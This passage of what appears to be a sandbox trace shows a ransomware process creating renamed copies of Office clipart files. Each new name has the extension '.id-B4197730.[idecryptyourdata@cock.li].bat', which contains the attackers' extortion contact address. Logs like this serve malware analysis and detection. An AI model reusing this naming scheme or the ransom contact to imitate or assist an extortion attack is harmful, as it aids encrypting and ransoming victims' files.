dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.209] CloseHandle (hObject=0x414) returned 1 [0173.666] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.666] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.666] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02756U.BMP.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02756u.bmp.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.666] CloseHandle (hObject=0x414) returned 1 [0173.668] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.668] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.668] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00257_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00257_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.668] CloseHandle (hObject=0x414) returned 1 [0173.669] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.669] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.669] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00289_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00289_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.670] CloseHandle (hObject=0x414) returned 1 [0173.673] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.673] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.673] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00299_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00299_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.674] CloseHandle (hObject=0x414) returned 1 [0173.675] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.675] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.675] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00305_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00305_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.675] CloseHandle (hObject=0x414) returned 1 [0173.677] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.677] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.677] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00333_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00333_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.677] CloseHandle (hObject=0x414) returned 1 [0173.678] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.678] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.678] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00345_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00345_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.678] CloseHandle (hObject=0x414) returned 1 [0173.679] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.679] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.679] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00350_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00350_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.680] CloseHandle (hObject=0x414) returned 1 [0173.680] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.681] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.681] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00352_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00352_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.681] CloseHandle (hObject=0x414) returned 1 [0173.682] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.682] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.682] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00364_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00364_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.682] CloseHandle (hObject=0x414) returned 1 [0173.683] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.683] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.683] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00367_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00367_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.683] CloseHandle (hObject=0x414) returned 1 [0173.684] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.685] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.685] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00373_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00373_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.685] CloseHandle (hObject=0x414) returned 1 [0173.686] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.686] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.686] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00382_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00382_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.686] CloseHandle (hObject=0x414) returned 1 [0173.697] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.697] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.698] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00390_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00390_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.698] CloseHandle (hObject=0x414) returned 1 [0173.699] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.699] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.699] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00391_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00391_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.699] CloseHandle (hObject=0x414) returned 1 [0173.700] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.700] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.700] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00416_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00416_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.700] CloseHandle (hObject=0x414) returned 1 [0173.702] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.702] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.702] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00423_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00423_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.702] CloseHandle (hObject=0x414) returned 1 [0173.703] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.703] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.703] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00444_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00444_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.703] CloseHandle (hObject=0x414) returned 1 [0173.704] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.704] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.704] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00452_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00452_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.704] CloseHandle (hObject=0x414) returned 1 [0173.705] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.705] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.705] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00453_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00453_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.706] CloseHandle (hObject=0x414) returned 1 [0173.706] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.707] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.707] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00454_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00454_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.707] CloseHandle (hObject=0x414) returned 1 [0173.708] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.708] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.708] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00466_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00466_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.709] CloseHandle (hObject=0x414) returned 1 [0173.710] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.710] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.710] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00476_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00476_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.711] CloseHandle (hObject=0x414) returned 1 [0173.969] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.969] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.969] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00479_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00479_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.970] CloseHandle (hObject=0x50c) returned 1 [0173.971] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.971] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.971] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00736_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00736_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.972] CloseHandle (hObject=0x50c) returned 1 [0173.973] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.973] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.974] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00768_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00768_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.974] CloseHandle (hObject=0x50c) returned 1 [0173.975] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.975] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.975] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00783_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00783_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.976] CloseHandle (hObject=0x50c) returned 1 [0173.976] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.976] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.977] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00820_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00820_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.977] CloseHandle (hObject=0x50c) returned 1 [0173.978] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.978] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.978] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00828_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00828_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.978] CloseHandle (hObject=0x50c) returned 1 [0173.979] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.979] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.979] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00834_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00834_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.980] CloseHandle (hObject=0x50c) returned 1 [0173.981] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.981] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.981] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00837_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00837_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.981] CloseHandle (hObject=0x50c) returned 1 [0173.984] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.984] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0173.984] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00910_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00910_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.984] 